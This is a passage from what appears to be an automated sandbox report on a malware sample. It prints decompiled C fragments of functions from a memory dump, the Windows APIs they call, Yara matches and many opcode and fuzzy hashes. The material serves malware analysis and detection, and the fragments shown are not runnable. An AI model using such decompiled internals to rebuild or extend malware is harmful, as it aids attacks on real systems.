                                                • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004082B4, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 35%
                                                			E004082B4(void* __edi, void* __eflags) {
				void* _t7;
				int _t8;
				intOrPtr _t11;
				void* _t12;
				void* _t15;
				void* _t18;
				long _t19;
				int _t21;
				int _t22;
				void* _t26;

				_t18 = __edi;
				es = __edi;
				asm("hlt");
				asm("aam 0x2f");
				asm("lahf");
				if(__eflags != 0) {
					if(__eflags == 0) {
						_push(_t26 - 0x40);
						_t21 = _t21 + 0x1c;
						__eflags = _t21;
						_push(_t21); // executed
					}
					_t7 = E0040ACD0(); // executed
					_t8 = L00414E20(_t21, _t7, 0, 0, 0xc4e7b6d6);
					_t22 = _t8;
					__eflags = _t22;
					if(_t22 != 0) {
						_push(_t18);
						_t19 =  *(_t26 + 0xc);
						_t8 = PostThreadMessageW(_t19, 0x111, 0, 0); // executed
						__eflags = _t8;
						if(__eflags == 0) {
							_t8 =  *_t22(_t19, 0x8003, _t26 + (E0040A460(__eflags, 1, 8) & 0x000000ff) - 0x40, _t8);
						}
					}
					return _t8;
				} else {
					_t11 =  *0x563b268c;
					_push(_t21);
					_t12 = E0041B2A0(_t11, _t15, 0x11c6f95e);
					return E0041B150(_t15) + _t12 + 0x1000;
				}
			}













                                                0x004082b4
                                                0x004082b4
                                                0x004082b6
                                                0x004082b7
                                                0x004082b9
                                                0x004082ba
                                                0x00408314
                                                0x00408319
                                                0x0040831a
                                                0x0040831a
                                                0x0040831d
                                                0x0040831d
                                                0x0040831e
                                                0x0040832e
                                                0x00408333
                                                0x00408338
                                                0x0040833a
                                                0x0040833c
                                                0x0040833d
                                                0x0040834a
                                                0x0040834c
                                                0x0040834e
                                                0x0040836b
                                                0x0040836b
                                                0x0040836d
                                                0x00408372
                                                0x004082bc
                                                0x004082bc
                                                0x004082c0
                                                0x004082c6
                                                0x004082dd
                                                0x004082dd

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: de1e0d92b6ecf77f32070f4208c109dfdd12e0b4867e729d3a71f3bc223bba47
                                                • Instruction ID: 7f6eeffa05ea93399c95f5b2e60ad50501f8bff5ba0d770fd4db3e3038a0bd11
                                                • Opcode Fuzzy Hash: de1e0d92b6ecf77f32070f4208c109dfdd12e0b4867e729d3a71f3bc223bba47
                                                • Instruction Fuzzy Hash: B501203194021476DA20AAA45C43FFE2318A780F15F05416FFF44BB1C1DABD590546E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A1C1, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 46%
                                                			E0041A1C1(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __eflags, int _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* __esi;
				signed int __ebp;
				intOrPtr* _t22;
				void* _t24;

				if(__eflags < 0) {
					 *0x094C3802 =  *0x094C3802 & __ecx;
					asm("sbb [ebx-0x74adeb3c], al");
					asm("adc al, 0x50");
					return  *((intOrPtr*)( *_t22))(_a12, _a16, __edx, __ecx, _t24);
				} else {
					__eax = __eax << __cl;
					__eflags =  *((intOrPtr*)(__edi + 0x26)) - __ah;
					__esp = __esp ^  *(__edx - 0x1374aac0);
					__eflags = __esp;
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0xa18));
					__esi = __eax + 0xc8c;
					__eax = E0041A960(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
					__edx = _a16;
					__eax = _a12;
					__ecx = _a8;
					__edx =  *__esi;
					__eax = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                                0x0041a1c6
                                                0x0041a1a1
                                                0x0041a1a7
                                                0x0041a1ae
                                                0x0041a1c0
                                                0x0041a1c8
                                                0x0041a1c8
                                                0x0041a1ca
                                                0x0041a1cd
                                                0x0041a1cd
                                                0x0041a1d1
                                                0x0041a1d3
                                                0x0041a1d6
                                                0x0041a1e2
                                                0x0041a1ea
                                                0x0041a1ef
                                                0x0041a1f2
                                                0x0041a1f5
                                                0x0041a1fc
                                                0x0041a200
                                                0x0041a202
                                                0x0041a203
                                                0x0041a204
                                                0x0041a204

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 71b008811e7eb22941acd3a83fa698d2989a21c35c06f682cec1c7bd0b2ddd2e
                                                • Instruction ID: 5e876629a821ffc6391a26ddbcb153cc47e541d699c30c05772f0983f65afc96
                                                • Opcode Fuzzy Hash: 71b008811e7eb22941acd3a83fa698d2989a21c35c06f682cec1c7bd0b2ddd2e
                                                • Instruction Fuzzy Hash: 8F01DCB16042447BEB14DF95DC84DE777A8EF88220F04829DFD0C8B642CA34A8248BB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a07f
                                                0x0041a087
                                                0x0041a09d
                                                0x0041a0a1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a047
                                                0x0041a05d
                                                0x0041a061

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a1ea
                                                0x0041a200
                                                0x0041a204

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                0x0041a0b3
                                                0x0041a0ca
                                                0x0041a0d8

                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A9967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ff0b31f32d211fc4f89a296c0d361304c432c8e53f923f36c056c89cd6797a2f
                                                • Instruction ID: d6ee82bc64036987f0fe2e1205dd10503a19861e85fc1da308eca2e5bf5c8e4e
                                                • Opcode Fuzzy Hash: ff0b31f32d211fc4f89a296c0d361304c432c8e53f923f36c056c89cd6797a2f
                                                • Instruction Fuzzy Hash: ABB09B719014C5D5DB11D7754608717794077D1751F56C065D2430785A4778C491F5B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00A998A0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b94a4f12482cdb6efdba9c2386846f6c47d639a420c28446a8cbd46aad416873
                                                • Instruction ID: 63cca503431c8dd1c8ff9aa18e6ab7e204ccf95cc53cd150c245cbd0df88f728
                                                • Opcode Fuzzy Hash: b94a4f12482cdb6efdba9c2386846f6c47d639a420c28446a8cbd46aad416873
                                                • Instruction Fuzzy Hash: DE90026130100412D202656944146060009D7D2395FD1C022E1824699D8B658953F172
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99820, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6cb6653092890690eccd88d0f0fcc2143785d692337dd2de93896fd92ac096a2
                                                • Instruction ID: 1b475124c7f0ab1f77c158d518fcd05bc82513688904ffc89c104b6d9f05a117
                                                • Opcode Fuzzy Hash: 6cb6653092890690eccd88d0f0fcc2143785d692337dd2de93896fd92ac096a2
                                                • Instruction Fuzzy Hash: 8490027124100412D241756944046060009A7D1391FD1C022A0824698E8B958A56FAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A9B040, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 854d3753fe2eb3304056b637835a4e69d8c3486208fede35255a82d198eb159b
                                                • Instruction ID: fcb9ee078bbb9080dc5e4be5f9d3e6c2d57bac66f51f7fea830f253b79b00e0c
                                                • Opcode Fuzzy Hash: 854d3753fe2eb3304056b637835a4e69d8c3486208fede35255a82d198eb159b
                                                • Instruction Fuzzy Hash: 7D9002A1601140534640B56948044065015A7E23513D1C131A08546A4C8BA88855E2A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A995F0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f371224009086f7c02204801945442b793463470d2381c86a98c7e8937665d1a
                                                • Instruction ID: 1643dc2bc761651d96d73cba387db0d37d39ba18f31501de9542c37f8115fbef
                                                • Opcode Fuzzy Hash: f371224009086f7c02204801945442b793463470d2381c86a98c7e8937665d1a
                                                • Instruction Fuzzy Hash: 5F90027120100812D20465694804686000597D1351F91C021A6424799E9BA58891B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A999D0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b21107234ae899ec7174343ac59d3d3ccf8639180e0e0e281c3d7c912521fe72
                                                • Instruction ID: 3f7536a0e90b538ea54ae7f8a844d5625d5c60f0905c3ee046da6d9f84ee6875
                                                • Opcode Fuzzy Hash: b21107234ae899ec7174343ac59d3d3ccf8639180e0e0e281c3d7c912521fe72
                                                • Instruction Fuzzy Hash: 4A9002A121100052D20465694404706004597E2351F91C022A2554698CCB698C61A165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99520, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f57afced4385bcfa8511314da1a88860c895d272f0f1cf70ac97e909a42a4ef5
                                                • Instruction ID: 1f79ba1d0eb4617aa949cbd9833698367171d152b1963d033b3179c374c8c48b
                                                • Opcode Fuzzy Hash: f57afced4385bcfa8511314da1a88860c895d272f0f1cf70ac97e909a42a4ef5
                                                • Instruction Fuzzy Hash: 069002E1201140A24600A6698404B0A450597E1351B91C026E14546A4CCB658851E175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A9AD30, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7394c3e2a744065c4726a9b1d19c05f7194cec6fa7b7f063f4f5cc79ff385856
                                                • Instruction ID: df182e5d408cacbf691b73efdddb92e941580fd32644be8c68c01143753d2016
                                                • Opcode Fuzzy Hash: 7394c3e2a744065c4726a9b1d19c05f7194cec6fa7b7f063f4f5cc79ff385856
                                                • Instruction Fuzzy Hash: F2900271A05000229240756948146464006A7E1791B95C021A0914698C8F948A55A3E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99560, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14449cdde330139c907741a2bb264034f60b88d204823f7a7cc11f8767ee4150
                                                • Instruction ID: 7a715ee041821422b2e789c03ed9f8a45bd6e4a680dad7fafa841974b07ef0b8
                                                • Opcode Fuzzy Hash: 14449cdde330139c907741a2bb264034f60b88d204823f7a7cc11f8767ee4150
                                                • Instruction Fuzzy Hash: 60900265221000120245A969060450B0445A7D73A13D1C025F18166D4CCB618865A361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99950, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21dc198b780cf1b8b108b52993a5fd476e0af149226aee778b33d6071fc36065
                                                • Instruction ID: f9d28af493443c89fa83410307c98d55ae1e309b0a67ee7dcdef6422e039bd70
                                                • Opcode Fuzzy Hash: 21dc198b780cf1b8b108b52993a5fd476e0af149226aee778b33d6071fc36065
                                                • Instruction Fuzzy Hash: 5D9002A120140413D24069694804607000597D1352F91C021A2464699E8F698C51B175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99A80, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d8deefdfa6c58fd33f47903432cc1917a6a26a36edbfe1ab7c353d62ebae917
                                                • Instruction ID: 1bd9a6f03d0466b76adb689b63e4019c6efc6b18a30758c8feec7e5808e81240
                                                • Opcode Fuzzy Hash: 9d8deefdfa6c58fd33f47903432cc1917a6a26a36edbfe1ab7c353d62ebae917
                                                • Instruction Fuzzy Hash: 9990026120144452D24066694804B0F410597E2352FD1C029A4556698CCF558855A761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A996D0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cbf5de5800ccc627ea684d9358bf1a85028ddb33e1e10700b532b16352e9f17
                                                • Instruction ID: 5258d204d6243eb2a6ee37de919b7318aee7adca04999d1e3cc2be1174ca5746
                                                • Opcode Fuzzy Hash: 8cbf5de5800ccc627ea684d9358bf1a85028ddb33e1e10700b532b16352e9f17
                                                • Instruction Fuzzy Hash: 2A90027120100852D20065694404B46000597E1351F91C026A0524798D8B55C851B561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99A10, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9fbcc4fb523595eca0b2339669c419fa1526b44906ef6c8d1fc07ce817ca3b20
                                                • Instruction ID: 99b9b2669607286ce64b2c77ed4fa705ce2b68fb232351180d94e9dce7f3a380
                                                • Opcode Fuzzy Hash: 9fbcc4fb523595eca0b2339669c419fa1526b44906ef6c8d1fc07ce817ca3b20
                                                • Instruction Fuzzy Hash: 4F90027120140412D20065694808747000597D1352F91C021A5564699E8BA5C891B571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99610, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba3689ca39714184724fe020dcbec9764c255601bac4bbc32da3b08c67c724b5
                                                • Instruction ID: b00053cfdeaa25587d0c61f134231e21aa9745ca094ab497ef0f0c81d2e5ee9b
                                                • Opcode Fuzzy Hash: ba3689ca39714184724fe020dcbec9764c255601bac4bbc32da3b08c67c724b5
                                                • Instruction Fuzzy Hash: 1590027160500812D25075694414746000597D1351F91C021A0424798D8B958A55B6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99650, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e30e7341aa3eae704242a8753c53f0caf1ac00c96a4e3618b7b825224578ab6
                                                • Instruction ID: 2e0538d0f5d4215fec1755c2863a1673135142babced9cb0bf8b7816666a2e95
                                                • Opcode Fuzzy Hash: 3e30e7341aa3eae704242a8753c53f0caf1ac00c96a4e3618b7b825224578ab6
                                                • Instruction Fuzzy Hash: 7590027120504852D24075694404A46001597D1355F91C021A04647D8D9B658D55F6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A9A3B0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8d6353a2ddbfe7291b3ceb6622c8aad48aa062338d9d103b6090d68fb66f5d2
                                                • Instruction ID: ad816458220ca16235b545578becc0f305866b7455da5bc8a8f7b6e859c76fd8
                                                • Opcode Fuzzy Hash: c8d6353a2ddbfe7291b3ceb6622c8aad48aa062338d9d103b6090d68fb66f5d2
                                                • Instruction Fuzzy Hash: 3590027120144012D2407569844460B5005A7E1351F91C421E0825698C8B558856E261
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99FE0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4717eb11b922ca763f63cfd7994985204483ec7c517878153c8c28316d199e85
                                                • Instruction ID: e8ef55b3b4adbd1686dd807c2cf377ff9f5483e261f33cb6f195f739ed8e862f
                                                • Opcode Fuzzy Hash: 4717eb11b922ca763f63cfd7994985204483ec7c517878153c8c28316d199e85
                                                • Instruction Fuzzy Hash: C990027131114412D21065698404706000597D2351F91C421A0C2469CD8BD58891B162
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99730, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1923760fc0b78608ace0e5372743eaf7ae8d6acd9f7ff8a6d60f50f1f7b5baff
                                                • Instruction ID: 924feee015f8d4409b632ce9f5522ffaed646df7fcd246f0aeb919085dcadc21
                                                • Opcode Fuzzy Hash: 1923760fc0b78608ace0e5372743eaf7ae8d6acd9f7ff8a6d60f50f1f7b5baff
                                                • Instruction Fuzzy Hash: AB90026160500412D24075695418706001597D1351F91D021A0424698DCB998A55B6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99B00, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e5801e5ed3b8dd23e6e4b43edf705b1baf85518b3327da79d8759112028a623
                                                • Instruction ID: 04cd48385b60f97b3237f3b0444471a7079007fa3abfb0a340b83b20b1fa3590
                                                • Opcode Fuzzy Hash: 2e5801e5ed3b8dd23e6e4b43edf705b1baf85518b3327da79d8759112028a623
                                                • Instruction Fuzzy Hash: B390026124100812D240756984147070006D7D1751F91C021A0424698D8B568965B6F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A9A710, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e446c72b4a016b86e35e132b3776d8cf2e644eddb498e2aad6d655cf94b0c71d
                                                • Instruction ID: 35a11b577a30819f7f18e71352b12bb94b50cbe7b9ec59375962f4abd4400c39
                                                • Opcode Fuzzy Hash: e446c72b4a016b86e35e132b3776d8cf2e644eddb498e2aad6d655cf94b0c71d
                                                • Instruction Fuzzy Hash: 12900271301000629600AAA95804A4A410597F1351B91D025A4414698C8B948861A161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99760, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36165e9bb65f12c2924b7994ac2d1df25a03bb016ba3cf44143c163c51a236fb
                                                • Instruction ID: 94dfe7ccef58f065973eda725007a8aeefd2e916e3881554f85584f41b6595d7
                                                • Opcode Fuzzy Hash: 36165e9bb65f12c2924b7994ac2d1df25a03bb016ba3cf44143c163c51a236fb
                                                • Instruction Fuzzy Hash: 2C90027120100413D20065695508707000597D1351F91D421A082469CDDB968851B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99770, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d94fd16abf593a06b15453d345c4cc105288a9289ac7f2d97541fb0555c39b77
                                                • Instruction ID: 97ada4bc5bf18b1c71b9ba1c452011edbd9b41a2a959ca446fe61864294aa2b8
                                                • Opcode Fuzzy Hash: d94fd16abf593a06b15453d345c4cc105288a9289ac7f2d97541fb0555c39b77
                                                • Instruction Fuzzy Hash: 7E90026120504452D20069695408A06000597D1355F91D021A14646D9DCB758851F171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A9A770, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
